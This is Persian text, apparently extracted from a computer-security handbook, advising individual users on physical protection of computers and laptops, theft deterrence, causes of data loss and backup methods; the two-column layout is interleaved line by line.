ﻫﻤﭽﻨﻴﻦ ﻧﺴﺒﺖ ﺑﻪ ﻓﺮﻭﺭﻓﺘﮕﻴﻬـﺎ ﻭ ﺑﺮﺁﻣـﺪﮔﻴﻬﺎﻱ ﺳـﻄﺤﻲ ﻛـﻪ
ﺭﻭﻱ ﺁﻥ ﻗﺮﺍﺭ ﺩﺍﺭﻧﺪ ﻧﻴﺰ ﺣﺴﺎﺱ ﻣﻲﺑﺎﺷﻨﺪ. ﭼﻨﺎﻧﭽﻪ ﺍﻃﻼﻋـﺎﺕ ﺍﺭﺯﺷـﻤﻨﺪﻱ )ﻣﺜـﻞ ﺩﺍﺩﻩﻫـﺎﻱ ﻛـﺎﺭﻱ ﻳـﺎ •
ﺍﻃﻼﻋﺎﺕ ﺷﺨﺼﻲ( ﺩﺭ ﺭﺍﻳﺎﻧﺔ ﺷﻤﺎ ﻭﺟـﻮﺩ ﺩﺍﺭﺩ ،ﻻﺯﻡ ﺍﺳـﺖ
ﺟﻨﺒﻪﻫﺎﻱ ﺩﻳﮕﺮ ﺍﻣﻨﻴﺖ ﻓﻴﺰﻳﻜﻲ ﺯﻣﺎﻧﻲ ﻛﻪ ﺁﻧﺮﺍ ﺑﺪﻭﻥ ﻣﺮﺍﻗﺒـﺖ ﻗـﺮﺍﺭ ﺩﺍﺩﻩ ﻭ ﻳـﺎ ﺍﺯ ﺁﻥ ﺩﻭﺭ
ﭼﻨﺎﻧﭽﻪ ﺷﻤﺎ ﺑﺮﺍﻱ ﻧﺼﺐ ﻳﻚ ﻗﻄﻌﻪ ﺳﺨﺖﺍﻓﺰﺍﺭﻱ ﺑﺪﻧـﺔ ﺭﺍﻳﺎﻧـﻪ ﻫﺴﺘﻴﺪ )ﻣﺜ ﹰﻼ ﺍﮔﺮ ﺍﺯ ﻫﺘﻞ ﺧﺎﺭﺝ ﻣﻲﺷﻮﻳﺪ ﻭ ﺭﺍﻳﺎﻧﻪ ﺩﺭ ﺍﺗﺎﻕ ﺍﺳـﺖ(
ﺧﻮﺩ ﺭﺍ ﺑﺎﺯ ﻛﺮﺩﻩﺍﻳﺪ ﺑﺎﻳﺪ ﺑﻪ ﺍﺧﻄﺎﺭﻫـﺎﻳﻲ ﻛـﻪ ﺩﺭﺑـﺎﺭﺓ ﺷـﻮﻛﻬﺎﻱ ﺍﻣﻜﺎﻥ ﺩﺳﺘﺮﺳﻲ ﻣﻨﻄﻘﻲ ١٥ﺑﻪ ﺁﻧﺮﺍ ﺗﺎ ﺣﺪ ﻣﻤﻜﻦ ﻛـﺎﻫﺶ
ﺍﻟﻜﺘﺮﻭﺍﺳﺘﺎﺗﻴﻚ ﺩﺍﺩﻩ ﺷﺪﻩ ﺗﻮﺟﻪ ﻛﻨﻴﺪ )ﺷﻮﻙ ﺍﻟﻜﺘﺮﻭﺍﺳﺘﺎﺗﻴﻚ ﺑﺎﻋـﺚ ﺩﻫﻴﺪ .ﺩﺳﺘﺮﺳﻲ ﻣﻨﻄﻘﻲ ﺑـﻪ ﻣﻌﻨـﺎﻱ ﺍﺳـﺘﻔﺎﺩﺓ ﻭﺍﻗﻌـﻲ ﺍﺯ
ﺻﺪﻣﻪﺩﻳﺪﻥ ﺳﺨﺖﺍﻓﺰﺍﺭ ﻣﻲﺷﻮﺩ ﻭ ﺑﺎﻳﺪ ﺍﺯ ﻭﻗﻮﻉ ﺁﻥ ﺟﻠﻮﮔﻴﺮﻱ ﻛﺮﺩ( .ﺿﻤﻨﹰﺎ ﺭﺍﻳﺎﻧﻪ ﺩﺭ ﺯﻣﺎﻧﻲ ﺍﺳﺖ ﻛﻪ ﺍﻣﻜﺎﻥ ﺩﺳﺘﺮﺳﻲ ﻓﻴﺰﻳﻜـﻲ ﺑـﻪ
ﺗﻮﺟﻪ ﻛﻨﻴﺪ ﻛﻪ ﺑﺮﺍﻱ ﺟﻠﻮﮔﻴﺮﻱ ﺍﺯ ﺑﺮﻕﮔﺮﻓﺘﮕﻲ ﻻﺯﻡ ﺍﺳﺖ ﺑـﺪﻥ ﺁﻥ ﻭﺟﻮﺩ ﺩﺍﺭﺩ .ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺭﻣﺰﻫـﺎﻱ ﻋﺒـﻮﺭ ﻣـﺴﺘﺤﻜﻢ ﻭ
ﺷﻤﺎ ﺑﺎ ﺯﻣﻴﻦ ﺩﺭ ﺗﻤﺎﺱ ﺩﺍﺋﻢ ﺑﺎﺷﺪ. ﻣﺤﺎﻓﻈﻬﺎﻱ ﺻﻔﺤﻪﻧﻤـﺎﻳﺶ ﻣﺠﻬـﺰ ﺑـﻪ ﺭﻣﺰﻫـﺎﻱ ﻋﺒـﻮﺭ
ﮔﺰﻳﻨﻪﻫﺎﻱ ﻣﻨﺎﺳﺒﻲ ﺑﺮﺍﻱ ﺷـﺮﻭﻉ ﺍﻳـﻦ ﻧـﻮﻉ ﺍﺯ ﺣﻔﺎﻇـﺖ
ﺑﺮﺍﻱ ﻣﺤﺎﻓﻈﺖ ﺍﺯ ﺩﺍﺩﻩﻫﺎﻱ ﺧﻮﺩ ﻫﺴﺘﻨﺪ )ﺑﺮﺍﻱ ﺍﻃﻼﻋﺎﺕ ﺑﻴﺸﺘﺮ ﺑﻪ ﺑﺤﺚ ﻣﺮﺑﻮﻁ ﺑﻪ ﻣﺠﻮﺯ ﻭﺭﻭﺩ ﺩﺭ
ﻫﻤﻴﻦ ﻓﺼﻞ ﺭﺟﻮﻉ ﻛﻨﻴﺪ(.
ﻧﺴﺨﻪﻫﺎﻱ ﭘﺸﺘﻴﺒﺎﻥ ١٧ﺗﻬﻴﻪ ﻧﻤﺎﻳﻴﺪ
ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﻛﻴﻔﻲ ﻭ PDAﻫﺎ ١٦ﻛﻮﭼﻚ ﻣﻲﺑﺎﺷـﻨﺪ ﻭ ﺑـﻪ •
ﺩﺭ ﻗﺴﻤﺖ ﻗﺒﻞ ﻣﻄﺎﻟﺒﻲ ﺩﺭ ﻣﻮﺭﺩ ﺍﻳﺠﺎﺩ ﺍﻣﻨﻴﺖ ﻓﻴﺰﻳﻜﻲ ﺁﻣـﺪ .ﺩﺭ
ﻫﻤﻴﻦ ﺩﻟﻴﻞ ﺩﺯﺩﻳﺪﻥ ﺁﻧﻬﺎ ﺁﺳﺎﻥ ﺍﺳـﺖ .ﭼﻨﺎﻧﭽـﻪ ﺍﺯ ﺁﻧﻬـﺎ
ﺍﻳﻦ ﻗﺴﻤﺖ ﻣﻮﺍﺭﺩﻱ ﺷﺮﺡ ﺩﺍﺩﻩ ﺧﻮﺍﻫﻨﺪ ﺷـﺪ ﻛـﻪ ﺑﻮﺳـﻴﻠﺔ ﺁﻧﻬـﺎ
ﺍﺳﺘﻔﺎﺩﺓ ﺯﻳﺎﺩﻱ ﻧﻤﻲﻛﻨﻴـﺪ ﺣﺘﻤـﹰﺎ ﺁﻧﻬـﺎ ﺭﺍ ﺍﺯ ﻣﺤـﻴﻂ ﻛـﺎﺭ
ﻣﻲﺗﻮﺍﻥ ﺍﻃﻤﻴﻨﺎﻥ ﺣﺎﺻﻞ ﻛﺮﺩ ﻛﻪ ﺩﺍﺩﻩﻫﺎ ﻭ ﺑﺮﻧﺎﻣﻪﻫﺎ ﺍﺯ ﺣﻔﺎﻇﺖ
ﺧﺎﺭﺝ ﻧﻤﺎﻳﻴﺪ.
ﻛﺎﻣﻞ ﺑﺮﺧﻮﺭﺩﺍﺭﻧﺪ .ﺷﻤﺎ ﭼﮕﻮﻧﻪ ﺍﺯ ﺩﺍﺩﻩﻫﺎ ﻭ ﺑﺮﻧﺎﻣـﻪﻫـﺎﻱ ﺭﺍﻳﺎﻧـﺔ
ﺧﻮﺩ ﺣﻔﺎﻇﺖ ﻣﻲﻛﻨﻴﺪ؟ ﻛﺎﺭﻱ ﻛﻨﻴﺪ ﻛﻪ ﻣﻴﻞ ﺑﻪ ﺩﺯﺩﻳﺪﻥ ﺭﺍﻳﺎﻧﻪ ﻛﺎﻫﺶ ﻳﺎﺑﺪ
ﺑﻪ ﭼﻨﺪ ﺩﻟﻴﻞ ﻣﻤﻜﻦ ﺍﺳﺖ ﺩﺍﺩﻩﻫﺎ ﺍﺯ ﺑﻴﻦ ﺑﺮﻭﻧﺪ ﻛﻪ ﺑﺮﺧﻲ ﺍﺯ ﺁﻧﻬﺎ
ﺍﻓﺮﺍﺩﻱ ﻛﻪ ﻣﺎﻳﻞ ﺑﻪ ﺧﺮﻳﺪ ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﺩﺳـﺖ ﺩﻭﻡ ﺑﺎﺷـﻨﺪ ﺑـﺴﻴﺎﺭ
ﺩﺭ ﺯﻳﺮ ﺁﻣﺪﻩ ﺍﺳﺖ:
ﺍﻧﺪﻙ ﻫﺴﺘﻨﺪ ،ﺧﺼﻮﺻﹰﺎ ﺍﮔﺮ ﻣـﺸﺨﺺ ﺑﺎﺷـﺪ ﻛـﻪ ﺭﺍﻳﺎﻧـﻪ ﺩﺯﺩﻱ
ﭘﺎﻙ ﺷﺪﻥ ﺍﺗﻔﺎﻗﻲ ﻓﺎﻳﻞ؛ • ﺍﺳﺖ .ﺑﻬﺘﺮﻳﻦ ﻭ ﺍﺭﺯﺍﻧﺘﺮﻳﻦ ﺭﻭﺵ ﺑﺮﺍﻱ ﺍﻳﻨﻜﻪ ﺳﺎﺭﻗﺎﻥ ﺗﻤﺎﻳﻠﻲ ﺑﻪ
ﺩﺯﺩﻳﺪﻩ ﺷﺪﻥ ﺭﺍﻳﺎﻧﻪ؛ •
14 Case
15 Logical Access
17 Backups 16 Personal Digital Assistants
٥٧ ﺑﺨﺶ ﺩﻭﻡ :ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﮐﺎﺭﺑﺮﺍﻥ ﻣﻨﻔﺮﺩ
ﺩﺍﺩﻩﻫﺎﻱ ﺧﻮﺩ ﺭﺍ ﺍﺯ ﺩﺳﺖ ﻧﻤﻲﺩﻫﻴﺪ ﻭ ﺩﺭ ﺍﻛﺜﺮ ﻣﻮﺍﻗﻊ ﻣﻲﺗﻮﺍﻧﻴـﺪ ﺫﺧﻴﺮﺓ ﻧﺎﺧﻮﺍﺳﺘﻪ ﻳﻚ ﻓﺎﻳﻞ ﺑﺮ ﺭﻭﻱ ﻓﺎﻳﻞ ﺩﻳﮕﺮ؛ •
ﺳﻴﺴﺘﻢ ﺧﻮﺩ ﺭﺍ ﺑﺎﺯﻳﺎﺑﻲ ﻛﺮﺩﻩ ﻭ ﺑﻪ ﻳﻚ ﺣﺎﻟﺖ ﻣﺘﻌﺎﺩﻝ ﻭ ﻣﺎﻧﺪﮔﺎﺭ ﺭﻭﻧﺪ ﻧﺎﺩﺭﺳﺖ ﺑﻪ ﺍﺟﺮﺍ ﺩﺭ ﺁﻣﺪﻥ ﻳﻚ ﺑﺮﻧﺎﻣﻪ ﺑﮕﻮﻧﻪﺍﻱ ﻛﻪ •
ﺑﺮﺳﺎﻧﻴﺪ .ﺣﺘﻲ ﺩﺭﺻﻮﺭﺗﻴﻜﻪ ﺩﺍﺩﻩﻫﺎﻱ ﺭﺍﻳﺎﻧﻪ ﺗﻤﺎﻣﹰﺎ ﺍﺯ ﺩﺳﺖ ﺭﻓﺘـﻪ ﺑﺎﻋﺚ ﺗﻐﻴﻴﺮ ﻳﺎ ﭘﺎﻙ ﺷﺪﻥ ﺩﺍﺩﻩﻫﺎ ﺷﻮﺩ؛
ﺑﺎﺷﺪ ،ﭼﻨﺎﻧﭽﻪ ﻳﻚ ﻣﺠﻤﻮﻋﺔ ﻛﺎﻣﻞ ﺍﺯ ﻧﺴﺨﻪﻫـﺎﻱ ﭘـﺸﺘﻴﺒﺎﻥ ﺩﺭ ﻭﺟﻮﺩ ﻳﻚ ﺑﺮﻧﺎﻣﺔ ﻣﺨﺮﺏ )ﻣﺜﻞ ﻭﻳﺮﻭﺱ( ﻛﻪ ﺑﺎﻋﺚ ﺗﻐﻴﻴـﺮ، •
ﺍﺧﺘﻴﺎﺭ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻴﺪ ﻗﺎﺩﺭ ﺧﻮﺍﻫﻴﺪ ﺑـﻮﺩ ﻫﻤـﺔ ﺍﻃﻼﻋـﺎﺕ ﺭﺍ ﺭﻭﻱ ﺑﺎﺯﻧﻮﻳﺴﻲ ﻭ ﻳﺎ ﺣﺬﻑ ﺩﺍﺩﻩﻫﺎ ﺷﻮﺩ؛
ﺭﺍﻳﺎﻧﺔ ﺟﺪﻳﺪ ﺑﺎﺯﻳﺎﺑﻲ ﻛﻨﻴﺪ ﻭ ﻣﺠﺪﺩﹰﺍ ﺑـﻪ ﺁﻧﻬـﺎ ﺩﺳﺘﺮﺳـﻲ ﺩﺍﺷـﺘﻪ ١٨
ﺑﺮﻭﺯ ﻣﺸﻜﻞ ﺩﺭ ﺳﺨﺖﺍﻓﺰﺍﺭ )ﻣﺜﻞ ﻣﺸﻜﻼﺕ ﺩﻳﺴﻚ ﺳﺨﺖ ، •
ﺑﺎﺷــﻴﺪ .ﺍﻟﺒﺘــﻪ ﺍﻳــﻦ ﻣــﺴﺌﻠﻪ ﺻــﺮﻓﹰﺎ ﺯﻣــﺎﻧﻲ ﻛﺎﺭﺁﻣــﺪ ﺍﺳــﺖ ﻛــﻪ ﺩﻳﺴﻚﮔﺮﺩﺍﻥ ،ﭘﺮﺩﺍﺯﺷﮕﺮ ﻭ ﻳﺎ ﻣﻨﺒﻊ ﺗﻐﺬﻳﻪ( ﺑﮕﻮﻧﻪﺍﻱ ﻛﻪ ﺑﺎﻋـﺚ
ﻧﺴﺨﻪﻫﺎﻱ ﭘﺸﺘﻴﺒﺎﻥ ﺩﺭ ﺟﺎﻳﻲ ﻏﻴﺮ ﺍﺯ ﺭﺍﻳﺎﻧﺔ ﻗﺮﺑﺎﻧﻲ ﺫﺧﻴﺮﻩ ﺷـﺪﻩ ﺍﺯ ﺑﻴﻦ ﺭﻓﺘﻦ ﺩﺍﺩﻩﻫﺎ ﮔﺮﺩﺩ؛
ﺑﺨﺶ ﺩﻭﻡ
ﺍﻳﻤﻨﻲ ﺩﺭ ﺑﺮﺍﺑﺮ ﺧﻄﺮﺍﺗﻲ ﻛﻪ ﺩﺭ ﺍﺩﺍﺭﻩ ﻭ ﻳـﺎ ﻣﻨـﺰﻝ ﺑـﺎ ﺁﻥ ﻣﻮﺍﺟـﻪ ﻧﻔﻮﺫﻫﺎ ﻭ ﺗﺨﺮﻳﺒﻬﺎﻱ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ
ﻫﺴﺘﻴﺪ ،ﻣﺆﺛﺮﺗﺮﻳﻦ ﺭﺍﻩ ﺍﺳﺖ.
ﻣﻬــﺎﺟﻤﻴﻦ ﻭ ﻭﻳﺮﻭﺳــﻬﺎﻱ ﻣﺨــﺮﺏ ﻣﺮﺗﺒ ـﹰﺎ ﺑﺎﻋــﺚ ﺗﻐﻴﻴــﺮ ﻭ ﻳــﺎ
ﻼ ﭼﻨﺪ ﻣﻮﺭﺩ ﺍﺯ ﺷﻴﻮﻩﻫﺎﻱ ﺗﻬﻴﺔ ﭘﺸﺘﻴﺒﺎﻥ ﺁﻣﺪﻩ ﺍﺳﺖ:
ﺫﻳ ﹰ ﭘﺎﻙﺷﺪﻥ ﺩﺍﺩﻩﻫﺎ ﻣﻲﺷﻮﻧﺪ .ﻭﺟﻮﺩ ﻧﺴﺨﻪﻫﺎﻱ ﭘـﺸﺘﻴﺒﺎﻥ ﺩﺭ ﺍﻳـﻦ
ﻓﺎﻳﻠﻬــﺎﻱ ﺣــﺴﺎﺱ ﺧــﻮﺩ ﺭﺍ ﺭﻭﻱ ﺩﻳــﺴﻚ ﻓﻼﭘــﻲ، • ﺯﻣﻴﻨﻪ ﻧﻴﺰ ﺑﻪ ﻛﺎﺭﺑﺮﺍﻥ ﻛﻤﻚ ﺷﺎﻳﺎﻧﻲ ﻣﻲﻛﻨﺪ.
ﺩﻳﺴﻜﻬﺎﻱ ﻧﻮﺭﻱ ،ﻭ ﻳﺎ ﺩﻳﺴﻜﻬﺎﻱ ﻣﻐﻨﺎﻃﻴﺴﻲ ﺑﺎ ﻇﺮﻓﻴﺖ
ﺍﻃﻼﻋﺎﺕ ﺑﺎﻳﮕﺎﻧﻲ
ﺑﺎﻻ ﻛﻪ ﻗﺎﺑﻠﻴﺖ ﭘﺎﻙﻛﺮﺩﻥ ﻧﻴﺰ ﺩﺭ ﺁﻧﻬﺎ ﻭﺟـﻮﺩ ﺩﺍﺭﺩ ﻛﭙـﻲ
ﻛﻨﻴﺪ. ﻧﺴﺨﻪﻫـﺎﻱ ﭘـﺸﺘﻴﺒﺎﻥ ﺑﻌﻨـﻮﺍﻥ ﺍﻃﻼﻋـﺎﺕ ﺑﺎﻳﮕـﺎﻧﻲﺷـﺪﻩ ﺗﻠﻘـﻲ
ﻣﻲﺷﻮﻧﺪ ﻛﻪ ﺍﻣﻜﺎﻥ ﻣﻘﺎﻳﺴﺔ ﻧـﺮﻡﺍﻓﺰﺍﺭﻫـﺎ ﻭ ﺩﺍﺩﻩﻫـﺎﻱ ﺭﺍﻳـﺞ ﺑـﺎ
ﻣﺤﺘﻮﻳﺎﺕ ﺩﻳﺴﻚ ﺭﺍ ﺭﻭﻱ ﻳﻚ ﺩﻳـﺴﻚ ﺍﻧﻌﻜﺎﺳـﻲ ٢٠ﻳـﺎ •
ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎ ﻭ ﺩﺍﺩﻩﻫﺎﻱ ﻗﺪﻳﻤﻲ ﺭﺍ ﺑﻮﺟﻮﺩ ﻣﻲﺁﻭﺭﻧﺪ .ﺍﻳـﻦ ﻗﺎﺑﻠﻴـﺖ
ﺍﮔﺮ ﻓﻀﺎﻱ ﻛـﺎﻓﻲ ﻣﻮﺟـﻮﺩ ﺍﺳـﺖ ﺭﻭﻱ ﻳـﻚ ﺷـﺎﺧﻪ ﺩﺭ
ﺑﺎﻋﺚ ﻣﻲﺷﻮﺩ ﺑﺘﻮﺍﻧﻴﺪ ﻣﺸﺨﺺ ﻛﻨﻴﺪ ﻛﻪ ﭼﻪ ﭼﻴﺰﻫﺎﻳﻲ ﻋﻤﺪﹰﺍ ﻳـﺎ
ﻫﻤﺎﻥ ﺩﻳﺴﻚ ﻣﺎﺩﺭ ﻛﭙﻲ ﻛﻨﻴﺪ .ﺍﻟﺒﺘﻪ ﺍﻳﻨﻜﺎﺭ ﺩﺭ ﺧﺮﺍﺑﻴﻬﺎﻱ
ﺳﻬﻮﹰﺍ ﺩﭼﺎﺭ ﺗﻐﻴﻴﺮ ﺷﺪﻩﺍﻧﺪ .ﺑﺮﺍﻱ ﺍﻳﻦ ﻣﻨﻈـﻮﺭ ﺍﮔـﺮ ﻧﺨﻮﺍﻫﻴـﺪ ﺑـﻪ
ﺍﺳﺎﺳﻲ ﻛﻤﻚ ﭼﻨﺪﺍﻧﻲ ﻧﻤﻲﻛﻨﺪ ﻭ ﺻﺮﻓﹰﺎ ﺍﮔـﺮ ﺗﻌـﺪﺍﺩﻱ ﺍﺯ
ﻋﻘــﺐ ﺑﺮﮔــﺸﺘﻪ ﻭ ﺗﺎﺭﻳﺨﭽــﺔ ﻳــﻚ ﭘــﺮﻭﮊﻩ ﺭﺍ ﺑﺎﺯﺳــﺎﺯﻱ ﻛﻨﻴــﺪ
ﻓﺎﻳﻠﻬﺎ ﺑﻄﻮﺭ ﻧﺎﺧﻮﺍﺳﺘﻪ ﭘﺎﻙ ﺷﻮﻧﺪ ﺑﻜﺎﺭ ﻣﻲﺁﻳﺪ.
ﻧﺴﺨﻪﻫﺎﻱ ﭘﺸﺘﻴﺒﺎﻥ ﻣﻨﺎﺑﻊ ﺍﺭﺯﺷﻤﻨﺪﻱ ﺑﺸﻤﺎﺭ ﻣﻲﺁﻳﻨﺪ.
ﻫﺮ ﺍﺯ ﭼﻨﺪﮔﺎﻩ ﺁﺭﺷﻴﻮ ﻓﺸﺮﺩﻩ ﺳـﺎﺯﻱﺷـﺪﻩﺍﻱ ﺍﺯ ﻓﺎﻳﻠﻬـﺎﻱ •
ﻣﻬﻢ ﺧـﻮﺩ ﺍﻳﺠـﺎﺩ ﻛﻨﻴـﺪ .ﺍﻟﺒﺘـﻪ ﻣـﻲﺗـﻮﺍﻥ ﭘـﺸﺘﻴﺒﺎﻧﻬﺎﻱ ﺳﺮﻗﺖ
ﻣﺮﺑﻮﻃــﻪ ﺭﺍ ﺭﻭﻱ ﻫﻤــﺎﻥ ﺳﻴــﺴﺘﻢ ﺍﻭﻟﻴــﻪ ﻭ ﻳــﺎ ﺭﻭﻱ ﺳﺮﻗﺖ ﺭﺍﻳﺎﻧﻪﻫﺎ ﻭ ﻓﺮﻭﺵ ﺁﻧﻬﺎ ﻛﺎﺭ ﺑﺴﻴﺎﺭ ﺁﺳﺎﻧﻲ ﺍﺳﺖ .ﺑـﺎ ﺗﻮﺟـﻪ
ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﺩﻳﮕﺮ ﻭ ﺩﺭ ﻣﻜﺎﻧﻬﺎﻱ ﻓﻴﺰﻳﻜﻲ ﻣﺘﻔـﺎﻭﺕ ﻛﭙـﻲ ﺑﻪ ﺍﻳﻦ ﻣﺴﺌﻠﻪ ،ﺗﻬﻴﺔ ﻧـﺴﺨﻪﻫـﺎﻱ ﭘـﺸﺘﻴﺒﺎﻥ ﻭ ﺫﺧﻴـﺮﺓ ﺁﻧﻬـﺎ ﺩﺭ
ﻧﻤﻮﺩ. ﻣﺤﻠﻲ ﺧﺎﺭﺝ ﺍﺯ ﺭﺍﻳﺎﻧﻪ ﻭ ﺩﺭ ﻣﻜﺎﻧﻲ ﺍﻣﻦ ﻛﻤـﻚ ﺷـﺎﻳﺎﻧﻲ ﺧﻮﺍﻫـﺪ
ﺍﺯ ﻓﺎﻳﻠﻬﺎﻱ ﺧﻮﺩ ﭘﺸﺘﻴﺒﺎﻥ ﺗﻬﻴﻪ ﻛﺮﺩﻩ ﻭ ﺍﺯ ﻃﺮﻳـﻖ ﺷـﺒﻜﻪ • ﺑﻮﺩ ،ﭼﺮﺍﻛﻪ ﻣﻮﺍﺭﺩ ﺑﺴﻴﺎﺭﻱ ﻭﺟﻮﺩ ﺩﺍﺷﺘﻪ ﻛـﻪ ﭘـﺸﺘﻴﺒﺎﻧﻬﺎ ﻧﻴـﺰ ﺑـﻪ
ﻳﺎ ﺍﻳﻨﺘﺮﻧﺖ ﺁﻧﺮﺍ ﺑﻪ ﺭﺍﻳﺎﻧﺔ ﺩﻳﮕﺮﻱ ﻣﻨﺘﻘﻞ ﻛﻨﻴﺪ. ﻫﻤﺮﺍﻩ ﺭﺍﻳﺎﻧﻪ ﺑﻪ ﺳﺮﻗﺖ ﺑﺮﺩﻩ ﺷﺪﻩﺍﻧﺪ.
ﻻ
ﮔﻮﻧﻪﻫﺎﻱ ﺩﻳﮕﺮﻱ ﺍﺯ ﭘﺸﺘﻴﺒﺎﻥﮔﻴـﺮﻱ ﻧﻴـﺰ ﻭﺟـﻮﺩ ﺩﺍﺭﺩ .ﻣﻌﻤـﻮ ﹰ ﺳﺎﺯﮔﺎﺭﻱ ٢١ﺳﻴﺴﺘﻢﻋﺎﻣﻞ ﻭ ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﻛـﺎﺭﺑﺮﺩﻱ ﺭﺍ ﺑـﺮ
ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﭘـﺸﺘﻴﺒﺎﻥﮔﻴـﺮ ﺩﺭ ﻣـﻮﺭﺩ ﭼﮕـﻮﻧﮕﻲ ﺗﻬﻴـﻪ ﭘـﺸﺘﻴﺒﺎﻥ ﻋﻬــﺪﻩ ﺩﺍﺭﻧــﺪ )ﻣﺜــﻞ ﺍﻧــﻮﺍﻉ ﻓﺎﻳﻠﻬــﺎﻱ ﺗﻨﻈﻴﻤــﺎﺕ ﻭ ﭘﻴﻜﺮﺑﻨــﺪﻱ(
ﭘﻴﺸﻨﻬﺎﺩﺍﺗﻲ ﺑﻪ ﻛﺎﺭﺑﺮ ﺍﺭﺍﺋﻪ ﻣﻲﻛﻨﻨﺪ. ﭘﺸﺘﻴﺒﺎﻥ ﺗﻬﻴﻪ ﮔﺮﺩﺩ .ﺗﻌﻴﻴﻦ ﻣﺤﻞ ﻧﮕﻬﺪﺍﺭﻱ ﺍﻳﻦ ﻓﺎﻳﻠﻬﺎ ﻭ
ﻫﻤﭽﻨﻴﻦ ﺍﻃﻤﻴﻨﺎﻥ ﺍﺯ ﺻﺤﺖ ﺁﻧﻬﺎ ﺑـﺮﺍﻱ ﺑﺎﺯﻳـﺎﺑﻲ ﺑـﺪﻭﻥ
ﻧﺴﺨﻪﻫﺎﻱ ﭘﺸﺘﻴﺒﺎﻥ ﺑﺎﻳﺪ ﺩﺭ ﻛﺠﺎ ﻧﮕﻬﺪﺍﺭﻱ ﺷﻮﻧﺪ؟ ﺍﺷﻜﺎﻝ ﺩﺭ ﺁﻳﻨﺪﻩ ﻛﺎﺭ ﺑﺴﻴﺎﺭ ﺩﺷﻮﺍﺭﻱ ﺍﺳﺖ ،ﺍﻣﺎ ﻣﻲﺗﻮﺍﻧﻴـﺪ
ﭘﺎﺳﺦ ﺍﻳﻦ ﺳﺆﺍﻝ ﻭﺍﺑﺴﺘﻪ ﺑﻪ ﺩﻟﻴﻞ ﺷﻤﺎ ﺑﺮﺍﻱ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﭘﺸﺘﻴﺒﺎﻧﻬﺎ ﺗﻤـﺎﻡ ﻓﺎﻳﻠﻬـﺎﻱ ﺩﺍﺩﻩﺍﻱ ﺧـﻮﺩ ﺭﺍ ﺩﺭ ﭼﻨـﺪ ﺷـﺎﺧﻪ ﺍﺻــﻠﻲ
ﺍﺳﺖ .ﺍﮔﺮ ﭘﺸﺘﻴﺒﺎﻥﮔﻴﺮﻱ ﺑـﺮﺍﻱ ﺣﻔﺎﻇـﺖ ﺍﺯ ﺩﺍﺩﻩﻫـﺎ ﺩﺭ ﻣﻘﺎﺑـﻞ ﻧﮕﻬﺪﺍﺭﻱ ﻛﻨﻴﺪ ﻭ ﭘﺸﺘﻴﺒﺎﻧﻬﺎ ﺭﺍ ﺑﮕﻮﻧﻪﺍﻱ ﺗﻬﻴﻪ ﻧﻤﺎﻳﻴﺪ ﻛـﻪ
ﺗﻨﻬﺎ ﺍﻃﻼﻋﺎﺕ ﻳﻜﺘﺎ ﻭ ﺍﺧﺘﺼﺎﺻﻲ ﺷﻤﺎ ﺭﺍ ﭘﻮﺷﺶ ﺩﻫﻨﺪ.
ﺑﺨﺶ ﺩﻭﻡ
ﺁﻳﺎ ﭘﺸﺘﻴﺒﺎﻧﻬﺎ ﻗﺎﺑﻞ ﺍﺳﺘﻔﺎﺩﻩ ﻫﺴﺘﻨﺪ؟ ﭼﻨﺎﻧﭽﻪ ﺩﺍﺩﻩﻫﺎﻱ ﺷﺨﺼﻲ ﺷﻤﺎ ﺯﻳﺎﺩ ﺍﺳﺖ ﻣﺘﻨﺎﻭﺑﹰﺎ •
ﺑﻪ ﭼﻨﺪ ﺩﻟﻴﻞ ﻣﻤﻜﻦ ﺍﺳﺖ ﻫﻨﮕـﺎﻡ ﻧﻴـﺎﺯ ﻧﺘﻮﺍﻧﻴـﺪ ﺍﺯ ﭘـﺸﺘﻴﺒﺎﻧﻬﺎﻱ ﺍﺯ ﺁﻥ ﭘﺸﺘﻴﺒﺎﻥ ﺗﻬﻴﻪ ﻧﻤﺎﻳﻴﺪ ،ﻭﻟﻲ ﺩﺭ ﻓﺎﺻﻠﻪﻫـﺎﻱ
ﺗﻬﻴﻪﺷﺪﻩ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻴﺪ: ﻛﻮﺗﺎﻩ ﻓﻘﻂ ﺍﺯ ﻓﺎﻳﻠﻬﺎﻳﻲ ﭘﺸﺘﻴﺒﺎﻥﮔﻴﺮﻱ ﻛﻨﻴـﺪ ﻛـﻪ
ﺩﭼﺎﺭ ﺗﻐﻴﻴﺮ ﺷﺪﻩﺍﻧﺪ .ﺑﻪ ﺍﻳﻦ ﻧـﻮﻉ ﭘـﺸﺘﻴﺒﺎﻥﮔﻴـﺮﻱ
ﻧﺴﺨﺔ ﻣﺮﺑﻮﻃﻪ ﺑﺴﻴﺎﺭ ﻛﻬﻨﻪ ﻭ ﻳﺎ ﺍﺯ ﻟﺤﺎﻅ ﻓﻴﺰﻳﻜﻲ ﺻﺪﻣﻪ •
ﭘﺸﺘﻴﺒﺎﻥﮔﻴﺮﻱ ﺍﻓﺰﺍﻳﺸﻲ ٢٢ﻣﻲ ﮔﻮﻳﻨﺪ .ﺗﻮﺟﻪ ﺩﺍﺷﺘﻪ
ﺩﻳﺪﻩ ﺑﺎﺷﺪ .ﺑﺮﻭﺯ ﺍﻳـﻦ ﻣـﺸﻜﻞ ﺩﺭ ﺩﻳـﺴﻜﻬﺎﻱ ﻓﻼﭘـﻲ ﻭ
ﺑﺎﺷـﻴﺪ ﻛـﻪ ﺑــﺮﺍﻱ ﺑﺎﺯﻳـﺎﺑﻲ ﻓﺎﻳﻠﻬــﺎ ﺩﺭ ﺍﻳـﻦ ﻧــﻮﻉ
ﺭﺳﺎﻧﻪﻫﺎﻱ ﻣﻐﻨﺎﻃﻴﺴﻲ ﺑﻴﺶ ﺍﺯ ﻫﻤﻪ ﺑﻪ ﭼﺸﻢ ﻣﻲﺧﻮﺭﺩ.
